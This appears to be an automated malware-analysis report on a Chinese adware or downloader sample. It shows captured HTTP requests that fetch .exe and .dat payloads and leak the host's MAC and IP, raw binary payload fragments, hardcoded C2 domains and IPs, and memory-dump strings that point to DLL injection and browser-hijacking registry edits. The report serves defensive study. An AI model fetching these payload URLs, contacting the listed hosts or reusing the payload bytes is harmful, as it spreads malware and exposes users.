nHI3CO5IFhWAsJctTmj IfiJj VnDiHf5btYxTcOw4HE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI Wu7vg7o4OGLvAksPnBhMH CyxDZVRIYXFFpm0MAo6DgC2QRv2YTwIwT29XazHhXVrQwYd9QvPwQZJhMLtkxzc e3eegsVDHMnL9ivEpOxIvWUuMNHYejBwLx/iGNmRaI76IgyeZ6CxPIylB3W6W1RAethCXJxn4TIhUbQEG nqE535kAcjU9543oC4gIS6EJvWgUgmdm 4w0urM26Q/DN7lXgm77d3uSvCPa6WJ3dP 0 PozyOOWpOPs3PDEnI5GjE2s0NmUj5ay0C63Xri3dBz1syS B8g2WM IdytADpRQFyAP 7ylSmTt3g1muGFuQInCnYYBlTg7qpn0PjnRKslycn0DaQTrWJvgEYtUqAbYm ARi1SoBtsxFne7vrIgWphWzKJDKM5esMaJudVXlW6wxom51VeVZRJhvIVRruRMTazQ2ZSPlrTy4BwLMjXdwzez15lN FkMTazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrerKWM57CHfPE2s0NmUj5a8TazQ2ZSPlr4B7qI/7jDkdq6eEq3M6/X4sYpk leK3vxNrNDZlI WstlRiJBQizq9wD3/sE6GlY/b0L4cnvGxdJ5wvSpxjT78TazQ2ZSPlrAMxzb2vHgefLKZW4QE43vl MjBJd7n7liximT6V4re/E2s0NmUj5awDMc29rx4HnxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlruLEY9WlPXabPujWuMtKVaBI/YfuliIbec2u2Y3QSKbD6OUxdrytW98V5xGSU6Cbodq73AHbTUINLCwdGx4DRMGOC5cvVPYkQN2Lg/ySWwyO 49HC2dMSn2FIEXX0xY8fdg6tbtu42d/E2s0NmUj5a2FjW8YTn/PO
<<
<<< skipped >>>
GET /12/ad22161.exe?mac=0050563cacd6&lip=192.168.150.144&user=58lm/temptation.bin&ver=10.10.17 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: download.cpudln.com
Connection: Keep-Alive
nConnection: Close
HTTP/1.1 404 Not Found
Date: Mon, 05 May 2014 13:29:53 GMT
Server: Apache
X-Powered-By: PHP/5.5.8
X-Frame-Options: Deny
Content-Length: 1361
Connection: close
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html>.<html>. <head>. <meta charset="utf-8">. <style type="text/css">. html, body, #partner, iframe {. height:100%;. width:100%;. margin:0;. padding:0;. border:0;. outline:0;. font-size:100%;. vertical-align:baseline;. background:transparent;. }. body {. overflow:hidden;. }. </style>. <meta content="NOW" name="expires">. <meta content="index, follow, all" name="GOOGLEBOT">. <meta content="index, follow, all" name="robots">. <!-- Following Meta-Tag fixes scaling-issues on mobile devices -->. <meta content="width=device-width; initial-scale=1.0; maximum-scale=1.0; user-scalable=0;" name="viewport">. </head>. <body>. <div id="partner"></div>. <script type="text/javascript">. document.write(. '<script type="text/javascript" language="JavaScript"'. 'src="//sedoparking.com/frmpark/'. window.location.host '/'. 'sedonewreg'. '/park.js">'. '<\/script>'. );. </script>. </body>.</html>...
<<
<<< skipped >>>
GET /getconfig/minisite.ini HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: get.woai310.com
Connection: Keep-Alive
HTTP/1.0 200 OK
Content-Length: 66
Content-Type: application/octet-stream
Last-Modified: Fri, 02 May 2014 10:25:14 GMT
Accept-Ranges: bytes
ETag: "30877cef065cf1:78e6"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 05 May 2014 10:26:05 GMT
Expires: Tue, 06 May 2014 10:26:05 GMT
Powered-By-ChinaCache: HIT from CNC-YT-3-3OR.3
Age: 11035
Powered-By-ChinaCache: HIT from CNC-YJ-2-3kA
Connection: keep-alive
[cfg]..url=hXXp://site.minimenhu.com/sh/index.html..rate=100/100....
GET /attachments/advert/201405/20140505190815.ico HTTP/1.0
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: icon.woai310.com
Connection: Close
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Mon, 05 May 2014 13:30:00 GMT
Server: Apache
Last-Modified: Mon, 05 May 2014 11:08:15 GMT
ETag: "10016f-25be-4f8a525d745c0"
Accept-Ranges: bytes
Content-Length: 9662
Content-Type: image/x-icon
X-Via: 1.1 fra73:0 (Cdn Cache Server V2.0)
Connection: close
......00.... ..%......(...0...`..... ......%..............................................................................................................*49.(28.........................................................................................................................................................................................1FM2.HR=....................................................................................................................................................................................4=?-5ZaI:gsD............................................................................................................................................................................27<S....-DNS2bm.8ep~=JQ)HPX.................................................................................................................................................................,03.,/9.4:A.'JT.)am.6oy./ISv>EM.48<.@EE..........................................................................................................................................................05e6<I..9@S*Ub.'[h.$Ub.*T^.-6>}6;B.=AC{7;<.................................................................................................................................................58=. ").AJY.'8@.%Uc..ES..9F.,Ye..%,.8@L.FIS.=BCX498.............................................................................................................................................,/6.&)5.FP\. ;F.&Wd..9A..27.)S`..!-.08E.
<<
<<< skipped >>>
GET /txt/whitelist.txt?ver=3.180&uid=qing01.4&lip=192.168.150.144&mac=0050563CACD6&p=0&b=0.0.0.0.0&md5=25AEE42B466DB1826F98A5F21A9A9C94 HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: a1.p2ptool.com
Connection: Close
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: Tengine/2.0.2
Date: Mon, 05 May 2014 13:30:20 GMT
Content-Type: text/plain
Content-Length: 3476
Last-Modified: Fri, 22 Nov 2013 08:41:51 GMT
Connection: close
ETag: "528f18cf-d94"
Accept-Ranges: bytes
/uOrJJOQ0bgY9jPW9p1UwzlabyskyS1ciztzZWKoyggyuwDxnQlnFOPszhAwXEvEP4Ro1Ye5GacBBM2ZDNbUU Fc3f8HO2qyXYpVEjVFoWD25ZqPJsCD8qOAB wgCXdRc0XuI/c7plLEOnja3WJ0VzSoUtOuytBo9YwHKaDQwFJ/phDpH1RmCT0PpVHeHte0bQ6FPVVO1cDEHLrc9hsubAeFdijjIAUPWLKAHfO1qSVWKjPB8v18PmI56rTDucF0jCYIsKUbX/gtuw1a 1n5bL6dhDiuNvG0kRhtox0AybwbErVMBK4XrK1obf LTAlyy77 sTZ3l0ESrpR2HHdxDEue6pcfMRhz0ZQahWmq8610CX29zZYVFy8H4hihJB2wjmGLCcv6NV ggd gsC/STce7Pnc19RuUC8HVCyN90N9Y87b4rbC PHFnT9tYDoFGmyyJgRwnmH04MROJDdJzbnxsJeuN tjovl57mS39 UIxrLwWibnt/RUpHPDIFivoP1rZPgoyGyE95m/oQtasAP8QFwrqal0MMZjhYDvG0wCByOT9AZLpjIdm4QwX2q1Z1EwLsRa/RJB4wvPvo42hN5l9kVaqbU rcG/IZZBR CayLrkJrly/6psVd4mRXOidYZdVeLWvHQjqVz0y6m VA2VnWwIEb3UeVG4pHbf1sFsTIRUyA8yri1qFQdgILxA C5RvEeLlw i9JjXOrCss4pbS7Gn3dTZPy7kD7aptBNwBZ8AXyqK1lu iWTl/ WkoR9Sj3yWf5MVOHoX0VXWWxQot2/8PHlSQzDVv 2De/01k1xpsCsqniIqyltVIso5nGBEpRygNWYEN9vdk1sZugGX007PYU1RmkDJowgiCqQE3Z S8bBaOD46ikCWqMp0G9E1AeswK2Fz55zwjKvkukxSlQ 11kwxCgKRMANZGEOBE5zuEAYr1tXJIAKEkCyHgSEhnCcSms7bXzTZ K xavSklFGxxJoPGgbM9ntFXfCfCSVEg/75DV2dtPnAVPulvRG6ad9b/psmHQ87Ydux5R4nebyiCGAe8dJXk ozRC7esRpe37G1KTy67ti3mGCfv3XaFfzEDCXAQJDXzydYGwzFbufHoC6Oba8MBykz0IRvTgoHtzTpc3irGlZlpVdPKLzftyFBXGFSCa8DGCYXvpqdbfgQF2RpFckUmT01I13SJamGR957aQ7zoWd2xRg0TSaLDSO1iVXspPs40FHsQj/U4VK wzXHEoiyLu19qAK1imxhLpQKlr3uOju wkOjTY2vzdHLI3adsBo8YTrxVZb9db1HdkTNRFco46wqEOgw2Ieq jeNXWMXndNju7gbC3N7/5twJIkqZFt6MP8 y28KrDOB/DYFOHqYtthS4UvBZQwGyAukrufTRbs3BENArT3eDtQ2sAZJu2SAkVick9vQughZJetuuHbPMUbUJifqAy131nC6fgdmPhUNapajXDdjBC1GNg7iHk7hQ/w3CkcoEtqSGlGA49EyNV7bwAGoVc7x/Xb8eCvC/nt4eeGsW
<<
<<< skipped >>>
GET /down/20131127183156.dat?mac=0050563cacd6&lip=192.168.150.144&user=58lm/temptation.bin&ver=10.10.17 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: VVV.iojjek.com
Connection: Keep-Alive
nConnection: Close
HTTP/1.1 200 OK
Server: nginx/1.4.2
Date: Mon, 05 May 2014 13:26:41 GMT
Content-Type: application/octet-stream
Content-Length: 50556
Last-Modified: Wed, 27 Nov 2013 10:31:57 GMT
Connection: keep-alive
ETag: "5295ca1d-c57c"
Accept-Ranges: bytes
...FT .....*.....e.<.8..$.f...f..\.2=.|.`.......Gp...A7..8>..C..ph.&.9.9. .4 E.U(?g.d.i^..$n=..3M..P.f.x...K..4....Q7O,..... ...#........;.b...g...a.......!..iB..o.G....M..].%2.$.../..-.w.l.....4\........l.....x..b)Z..c3..P.Oy.\..k..W..ve..g.?v....d.jp.p.......cD.~.R..M.......}....N.x.V.9n@..z....'(&.....5=.5..bM1..g../....;..%..v..i..J@7.M....;.].......tY.[..ZP..~.A...K...d.... .s^...W.%.'@0..$..kc.....M.4.^..H.F......&.mdB....u'.9.cM6...j\[........qI].NYe...<rt<../....=....&.5 ...f5....W.J[m.....1'!.....N..&.3.B....e.....} {h..y..Et....%;.z....t.....i.^.mk[..,2R...p..P.`..aY.*.H-%}R.GO.3.f..J..->..x....:..'.l/.VU.....,f.Y.DC....;..]k.R.......{.....n....I...^.Z.(.....Z......L.....2...J..^U......[......~. lk .........299..'...z....4..%-h...b.P=h2.P.N.G......)...'.........N.t....Z....O.........g.p!N.l.*.~y....Fr.\...S..o..@m..;....n..GN){..........i.....dM\..a.`..f-..m.^..)*...!......&.\..|.U..w....u.@.......cUQ...n.J*..# .....*!f.=...Lr......N.....).x....Wb.9H.Y%,"..cX.....k..4.....2.....1u.....J.5, ..v...T.5....2]O]a..J.@.=.S../2.........d..31.6.DZ.............m3W4T......&]4.B..G..5...P....F.w.j.@U...3..CN.....[.o.p..&...*.X..>..[.....<.-d}U.M.-....n..rg.w<u@d#.*...E:.'6..d..c....f...p..7...V..u..g.`....}...TXc[..:...........Fn[?..f6..g..W.T...NkP...&....'.......t(.&....k..F......h.@.AX....A,...O ...Y$.3..Z...6...........t........3...zr.%.H..xyJ.M.6.n.u..k,..&l$g.>....Cz....}...%.s._.d......m...JIi.?.3..W.>8..i..l..d.X..4I...{.....Q..4.....?3I.\..k.......-@=a n.t.V.6.9...4.f{.....
<<
<<< skipped >>>
GET /txt/shock.txt?ver=3.180&uid=qing01.4&lip=192.168.150.144&mac=0050563CACD6&p=0&b=0.0.0.0.0&md5=83CAF3E7E328C4F1B414B0565546DA23 HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: a1.p2ptool.com
Connection: Close
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: Tengine/2.0.2
Date: Mon, 05 May 2014 13:30:16 GMT
Content-Type: text/plain
Content-Length: 148828
Last-Modified: Thu, 17 Apr 2014 07:55:19 GMT
Connection: close
ETag: "534f88e7-2455c"
Accept-Ranges: bytes
nHI3CO5IFhWAsJctTmj IfiJj VnDiHf5btYxTcOw4HE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WtCdFRaA9XVxQksPnBhMH CyxDZVRIYXFFpm0MAo6DgC2QRv2YTwIwT29XazHhXVrQwYd9QvPwQZJhMLtkxzc e3eegsVDHMnL39DUU4LfAlWqACucvJNley6BpcOtgXvxAGD6yVdD1fgnTu1gz46nHmlJeS7gVhCvzllN2q6zXSsEMlHGEovC/aPfEggeF50C0VAzlc/ipMMTazQ2ZSPlrxNrNDZlI WvE2s0NmUj5ay0C63Xri3dBH2e0sSQxX6L3YNPrA6SxffkC2j/6HSdWNx2iFnjmvV1Za/qxG5FKhyH jXHNQt jlycn0DaQTrWJvgEYtUqAbYm ARi1SoBtCcK3NitDljZ7NldsOW7Tl sMaJudVXlW6wxom51VeVZRJhvIVRruRMTazQ2ZSPlr5 6svh39z8kXrzVqnjK8acTazQ2ZSPlrxNrNDZlI WsV0oGq6efdAcTazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrKgLvjirKJq3E2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrTPMmJn/9ziFX6ZO/vq7NW4sYpk leK3vxNrNDZlI WtXEcfORTifCxn ZMaxjFZ7OTs V aE1YKVnrCUGLJaz8TazQ2ZSPlrEkYhq4qBTrw/Rp3LuKWWWLx KBVdWisj2lLwty1A4B7E2s0NmUj5a3C2I9Jaq5QixNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrGwk/Dns/Y08qL4WDoLD oVJ6Oa6pZcW7uByTfYjFs4ofjbZOTR2cpljcZhpxIRluMrSf 27YDFlc9WW9X5M2 HK1T7k0wJG9loSSFo7oYByaolQZPE f2SIElu1a0HXgdJCg3cKUW92EYKZbvZ6q3fqC2tVIXFVNOPexGaO KaVDWBItot0B7KRLakOm85PAulfEO9kaOEIRw4Txh6W/juZBxPpHmbly
<<
<<< skipped >>>
GET /down/20140404174727.dat?mac=0050563cacd6&lip=192.168.150.144&user=58lm/temptation.bin&ver=10.10.17 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: VVV.iojjek.com
Connection: Keep-Alive
nConnection: Close
HTTP/1.1 200 OK
Server: nginx/1.4.2
Date: Mon, 05 May 2014 13:26:41 GMT
Content-Type: application/octet-stream
Content-Length: 52808
Last-Modified: Fri, 04 Apr 2014 09:47:27 GMT
Connection: keep-alive
ETag: "533e7faf-ce48"
Accept-Ranges: bytes
...a.n...k.....X.l...1..'.o...o.._.:..u.G..1..o:|..L..*..}z....3..E.v#s.]......T...m.5.......A...a..Y.Uv.&....4....k.f..;\`.w......j...e...F....=Eo.._.l.....d.@..~.5..9..Y.g.....W..[b..4pq#.g<.pb.V....bGc.1d...Xf@.....k6.....p.G"u.."........!..v..l.g.;u..i......Y.g<.M......WW.3.U......[A..^)...7.......H.(j....84..p.....h........~.W.......%....0..[.bmH=.w...D..Fg...{j.'X.y.x...,....4./W..C`.cC...}...N.l.>R.S...VNm........C.......;!.M......X.......q.^....}}...[.6....v*.. ..,..B..}.....=.ux..j."$.U.....WUt%.....7e=...x....!8.....Gga...m.^H...n..m.B....]KY3aL..g..C.e.Om..`.U...kA......?PT]W...9k]".y.0<[.A..y0B....oXF.....m.........p..b6.#[|&vz8.?X...?....f./..>=...r.....6{...T...|<.....>...inu~.w....X%].D..........`.,.......7.G}..nE,..8..c.......=....$o....r..4;.@.. ./.a..8=....l....}.R.}.]s.}VV.........AZ`ilj.d.2.J..#...M.m.;<....... ............'..m..i....t....g..}...B6.t.9.U0..D..{.C.......D...(_X....&.y.j....u...V........5.!.Z..w$..?.....}].......[uVh.....o7......GW.~....)i.A...Y.......q..5e'....3.s.m.".S1b{.|....c....Kl.....i.9s.'>.v....gc.*..c.d].cu.......yl`..Tl.].............&5d..FP..^..<:UEa..9VMF...i.c#.Q[V.8@x...r...h...R..._...u..2.UQC.'...gM3.<m.%...p'..|.B_...i|.......#...@.G..W-D.v.fG.& ..I0.d_.6G..2..........$....7]Wc$.....("..}..u..<$..r....iq.*T.7...;..A.....?X.4..s.^;w...@.2.1..Jq3..Is...(.WM..B....J... @...uk=.t/.L..h:....F.M.)Sp....x.x.%v.....0..L...|.4..t.....a.b7"../vzU..&~...u.('..P.UO........~.. ........5&..;.....`s6K.........3sT........w{zkyg...f..'s...f
<<
<<< skipped >>>
Map
Strings from Dumps
%original file name%.exe_1040:
.text
.text
`.rdata
`.rdata
@.data
@.data
.rsrc
.rsrc
@.fyf
@.fyf
<.SSWh
<.SSWh
KERNEL32.dll
KERNEL32.dll
USER32.dll
USER32.dll
ShellExecuteA
ShellExecuteA
SHELL32.dll
SHELL32.dll
_acmdln
_acmdln
MSVCRT.dll
MSVCRT.dll
EXE_temp%x%s
EXE_temp%x%s
EXE_temp0.exe
EXE_temp0.exe
EXE_temp1.EXE
EXE_temp1.EXE
EXE_temp2.exe
EXE_temp2.exe
EXE_temp3.exe
EXE_temp3.exe
EXE_temp4.EXE
EXE_temp4.EXE
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\EXE_temp4.EXE
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\EXE_temp4.EXE
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
"%"""&"""!!""
"%"""&"""!!""
.Fj)V
.Fj)V
DO*.tnCU
DO*.tnCU
$%c&#'(
$%c&#'(
j.CjI
j.CjI
%DQ80*f.b
%DQ80*f.b
*3x<%Sc
*3x<%Sc
b;.Nj
b;.Nj
?456789:;<=
?456789:;<=
!"#$%&'()* ,-./
!"#$%&'()* ,-./
0,1'8"5.*2$
0,1'8"5.*2$
\\.\SSDT
\\.\SSDT
@~MSVCRT3
@~MSVCRT3
5A937EE-621D-4F66-8C
5A937EE-621D-4F66-8C
fit.exhGET
fit.exhGET
ngKbytes=%d-
ngKbytes=%d-
%s\Cxnec
%s\Cxnec
Sw -gU|u.Cj{{
Sw -gU|u.Cj{{
d2
d2
g7http:/
g7http:/
fi.Pz`
fi.Pz`
msvcrt>
msvcrt>
}w%dk8V/
}w%dk8V/
zcÁ
zcÁ
j.rPS\
j.rPS\
E:\CODE_P~1\p2
E:\CODE_P~1\p2
9|!3<3[3
9|!3<3[3
D:\Te
D:\Te
%FinA
%FinA
KERNEL32.DLL
KERNEL32.DLL
ADVAPI32.dll
ADVAPI32.dll
iphlpapi.dll
iphlpapi.dll
SHLWAPI.dll
SHLWAPI.dll
WININET.dll
WININET.dll
WS2_32.dll
WS2_32.dll
RegFlushKey
RegFlushKey
InternetCrackUrlA
InternetCrackUrlA
.idata
.idata
.rdata
.rdata
P.reloc
P.reloc
P.rsrc
P.rsrc
kernel32.dll
kernel32.dll
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
oleaut32.dll
oleaut32.dll
EVariantBadIndexError
EVariantBadIndexError
u%CNu
u%CNu
TOnAskForKey
TOnAskForKey
OnAskForKeyT
OnAskForKeyT
Visit http://www.abyssmedia.com for more info.
Visit http://www.abyssmedia.com for more info.
cmd.exe /c
cmd.exe /c
command.com /c
command.com /c
user32.dll
user32.dll
GetKeyboardType
GetKeyboardType
advapi32.dll
advapi32.dll
RegOpenKeyExA
RegOpenKeyExA
RegCloseKey
RegCloseKey
GetWindowsDirectoryA
GetWindowsDirectoryA
GetCPInfo
GetCPInfo
: :$:(:,:0:4:8:
: :$:(:,:0:4:8:
-,.4031652,
-,.4031652,
*)$#"&&%
*)$#"&&%
KWindows
KWindows
UrlMon
UrlMon
`.data
`.data
MSVBVM60.DLL
MSVBVM60.DLL
vb6chs.dll
vb6chs.dll
D:\Program Files\Microsoft Visual Studio\VB98\VB6.OLB
D:\Program Files\Microsoft Visual Studio\VB98\VB6.OLB
VBA6.DLL
VBA6.DLL
L.iNz
L.iNz
z[^.ZW1
z[^.ZW1
1u.xJ
1u.xJ
E/%sT
E/%sT
-.nF*4
-.nF*4
-i7u}
-i7u}
H8 %u,O[
H8 %u,O[
b.Yy]
b.Yy]
"m.ZGI(
"m.ZGI(
>%uK1>
>%uK1>
v-|%s\u
v-|%s\u
$L.QWF7
$L.QWF7
@q.kv
@q.kv
.lh3i
.lh3i
.gBk_
.gBk_
_%8xE)
_%8xE)
:.dA qz
:.dA qz
~gzK%s
~gzK%s
]%UYa
]%UYa
0[<hsT-y><pre>i%x^K</pre><pre>&0.IR</pre><pre>V.eeW</pre><pre>kGd%S</pre><pre>X*.QdL</pre><pre>i.zOoz</pre><pre>Z%XHt</pre><pre>1, 0, 3, 916</pre><pre>0, 0, 0, 0</pre><pre>%String list does not allow duplicates</pre><pre>Cannot create file "%s". %s</pre><pre>Cannot open file "%s". %s$''%s'' is not a valid component name</pre><pre>Invalid property value List capacity out of bounds (%d)</pre><pre>List count out of bounds (%d)</pre><pre>List index out of bounds (%d) Out of memory while expanding memory stream</pre><pre>Error reading %s%s%s: %s</pre><pre>%s.Seek not implemented$Operation not allowed on sorted list</pre><pre>Property %s does not exist</pre><pre>Ancestor for '%s' not found</pre><pre>Cannot assign a %s to a %s</pre><pre>Class %s not found%List does not allow duplicates ($0%x)#A component named %s already exists</pre><pre>%s (%s, line %d)</pre><pre>Abstract Error?Access violation at address %p in module '%s'. %s of address %p</pre><pre>System Error. Code: %d.</pre><pre>Invalid variant operation%Invalid variant operation (%s%.8x)</pre><pre>%s5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)</pre><pre>Operation not supported</pre><pre>External exception %x</pre><pre>Interface not supported</pre><pre>Invalid pointer operation</pre><pre>Invalid class typecast0Access violation at address %p. %s of address %p</pre><pre>Privileged instruction(Exception %s in module %s at %p.</pre><pre>Application Error1Format '%s' invalid or incompatible with argument</pre><pre>No argument for format '%s'"Variant method calls not supported</pre><pre>!'%s' is not a valid integer value</pre><pre>I/O error %d</pre><pre>Integer overflow Invalid floating point operation</pre><pre>1. 1. 1. 1</pre><pre>0.0.0.0</pre><pre>"%Program Files%\Internet Explorer\IEXPLORE.EXE" -nohome</pre><pre>WScript.Shell</pre><pre>HKEY_CLASSES_ROOT\http\shell\open\command\</pre><pre>- http://guangnen123.com/</pre><pre>1.00.0001</pre><pre>reg.exe</pre><b>EXE_temp2.exe_1176:</b><pre>.text</pre><pre>`.data</pre><pre>.rsrc</pre><pre>MSVBVM60.DLL</pre><pre>vb6chs.dll</pre><pre>D:\Program Files\Microsoft Visual Studio\VB98\VB6.OLB</pre><pre>VBA6.DLL</pre><pre>"%Program Files%\Internet Explorer\IEXPLORE.EXE" -nohome</pre><pre>WScript.Shell</pre><pre>HKEY_CLASSES_ROOT\http\shell\open\command\</pre><pre>- http://guangnen123.com/</pre><pre>1.00.0001</pre><pre>reg.exe</pre><b>EXE_temp3.exe_816:</b><pre>__MSVCRT_HEAP_SELECT</pre><pre>user32.dll</pre><pre>USER32.dll</pre><pre>58lm/temptation.bin</pre><pre>.IUQT</pre><pre>[.aoH</pre><pre>[8~%xs</pre><pre> .oN7</pre><pre>z.Tl&</pre><pre>C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\EXE_temp3.exe</pre><pre>GetProcessHeap</pre><pre>GetCPInfo</pre><pre>.text</pre><pre>`.rdata</pre><pre>@.data</pre><pre>KERNEL32.DLL</pre><b>EXE_temp3.exe_816_rwx_00350000_0005A000:</b><pre>SSSSh</pre><pre>__MSVCRT_HEAP_SELECT</pre><pre>user32.dll</pre><pre>inflate 1.2.3 Copyright 1995-2005 Mark Adler</pre><pre>ERSION.dll</pre><pre>WINDOWS</pre><pre>Find In FileLib, API[%s]</pre><pre>Find In MemLib, API[%s]</pre><pre>API[%s]</pre><pre>Jmp Address: X</pre><pre>API[%s] CodeSize:%d</pre><pre>%s%s%s</pre><pre>:%d: %s</pre><pre>DNS %s->%d.%d.%d.%d</pre><pre>118.145.16.39</pre><pre>www.iiewl.com</pre><pre>118.145.16.38</pre><pre>www.iojjek.com</pre><pre>host:X</pre><pre>127.0.0.1</pre><pre>208.67.222.222</pre><pre>208.67.220.220</pre><pre>114.114.114.114</pre><pre>114.114.115.115</pre><pre>8.8.8.8</pre><pre>8.8.1.1</pre><pre>8.8.4.4</pre><pre>xid:X</pre><pre>sizeof(DNS_QUERY):%d</pre><pre>DNS IP : %d.%d.%d.%d</pre><pre>CNAME : %s</pre><pre>Length : %d</pre><pre>LiveTime : %d</pre><pre>Class : %d</pre><pre>Type : %d</pre><pre>Domain:%s</pre><pre>AdditionalCount:%d</pre><pre>NameServerCount:%d</pre><pre>AnswerCount :%d</pre><pre>QuestionCount :%d</pre><pre>rcode:%d</pre><pre>recvfrom ret:%d</pre><pre>sendto ret:%d</pre><pre>dns_query() Use Dns Server: %s</pre><pre>dns_query() iServer:%d</pre><pre>Shell.Dusn</pre><pre>data_len:%d body_len:%d lphdr->len:%d</pre><pre>Tcp Client Get Config Thread Proc.</pre><pre>downtime:M-d-d d:d:d</pre><pre>%a, %d %b %Y %H:%M:%S</pre><pre>get_hostent(%s,X)</pre><pre>1.2.3</pre><pre>chunk exit, chunk.length:%d chunk_size:%d chunk_size_len:%d</pre><pre>, nCopy:%d</pre><pre>Gzip Unpack, hFile:X</pre><pre>recv_over break_mode:%d recv_len/cont_len:%d/%d body_len/file_len:%d/%d down_ok:%d</pre><pre>%s%sX%s</pre><pre>file_len:%d cont_len:%d header_end_len:%d</pre><pre>, size:%d</pre><pre>conn.s:X</pre><pre>lpHost:%s</pre><pre>, errno:%d</pre><pre>User-Agent:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)</pre><pre>bytes=%d-%d</pre><pre>bytes=%d-</pre><pre>HTTP/</pre><pre>HTTP/</pre><pre>, ini->ngroup=%d</pre><pre>i:%d len:%d ini->nline:%d</pre><pre>scan_ini ini->ngroup:%d</pre><pre>NtFunID:%4X dwKiFastSystemCall:X</pre><pre>dwKiFastSystemCall:X</pre><pre>ntdll.dll</pre><pre>ZwQueryValueKey</pre><pre>ZwOpenKey</pre><pre>InjectDll type:%u count:%u %s</pre><pre>g_ipcount:%d</pre><pre>ptable->dwNumEntries:%d</pre><pre>%s->Characteristics:X %d AdapterName:%s</pre><pre>SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}</pre><pre>ip:%s</pre><pre>idx:%d Type:%d %s %s</pre><pre>localhost:%d.%d.%d.%d</pre><pre>%-8s: %d</pre><pre>%-8s: %d.%d.%d.%d</pre><pre>%-8s: X-X-X-X-X-X</pre><pre>index:%d mac_str:%s</pre><pre>xxxxxx</pre><pre>ITA %s->%s</pre><pre>, cmp=%d</pre><pre>kvs.size=%d</pre><pre>lpBaseAddress:x dwReadLen:%d</pre><pre>FileSize:%d</pre><pre>M-d-d 